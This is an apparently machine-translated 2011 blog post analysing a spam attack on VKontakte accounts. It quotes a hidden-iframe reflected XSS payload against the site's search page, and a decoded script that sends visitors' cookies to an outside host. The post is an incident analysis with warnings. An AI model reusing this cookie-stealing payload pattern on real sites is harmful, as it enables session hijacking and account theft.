Main » 2011 » Март » 16 » Xss vkontakte
13:05
Xss vkontakte

Background (you can not read)


I come home tonight and see in a personal vkontakte 9 messages. Because I do not particularly like and do not often visit this resource - these things event was strange. The reports that users have written to me vkontakte spammers. Bad, but oh well, change your password and all ... although thinking: old password - 12 character alphanumeric, sbrutit almost neraelno. Complex crystal clear and is not contagious ... So what's the deal?

Debriefing


Look message, sent on my behalf:


hello, IT'S not Spam! Raccylayu IT'S coobschenie entire team cvoim druzyam.ya cegodnya delete cvoyu ctranichku vkontakte, doctal Spam okonchatelno.Tak chto, ecli chto-verily will nuzhno, or The zvoni \ write to mobilnik, look for me or The zdec http://odnonochniki.?tk/, there xotya would no Spam), I pod cvoey name and imnem.vot so.


And then realize that my natural curiosity led me in this time. Yesterday, a similar message came to me, and of course, sitting at the opera, chustvuya safe I went to this link.

And now we come to this page (of nezaloginennogo browser), and watch the code. What do we see?
The code is loaded hidden iFrames:


<iframe src = 'http://% 76% 6b% 6f% 6e% 74% 61% 6b% 74% 65% 2e% 72% 75 / gsearch.php? q =% 27 ;()())// \% 27; document.write (String.fromCharCode (60,115,99,114,105,112, there was still a lot of numbers separated by a comma, which stretched the page and pick them up for a UFO. If someone they really need - in a personal ))//% 22;% 3C% 3E% 22) / / \% 22;% 3C% 3E% 22% 3C% 3E% 22% 22 !---% 22?% 3E # c [q] =% 27% 3B ()())% 20% 20 \ & c [section] = people 'style =' display: none ;'></ iframe>


The link leads to zaURLencode-nny «vkontakte.ru», the script that performs the search. As you know, after searching for the query text is displayed back to the user, this (as well as lack of proper filtering) and used the spammers in this case.
In the query string embedded Javascript-code, in this case with encrypted in the ASCII code of another frame:

<script> document.write ('<iframe src = "http://webzer.vov .ru / s.php? dc = '+ document.cookie +' "style =" display: none ;"></ iframe >');</ script>

This actually is a sniffer on the who fly and cookies vkontakte some curious users like me.

The vulnerability is accurate at the time of writing, a simple alert (tested under Opera) demonstrates this. In IE does not work, because there is no protocol support for «data:», and I'm not an expert on writing exploits.

Some of the conclusions


  • Do not walk on the left links.
  • Secure browser guarantees nothing (in this case, the XSS-vulnerability in the "biggest own site), but the vigilance of lulls


UPD: Example from the alerts stopped working after only 3.5 hours after the publication of . For those who did not see a screenshot saved.
Views: 613 | Added by: w1zard | Rating: 0.0/0
Total comments: 0
Имя *:
Email *:
Код *: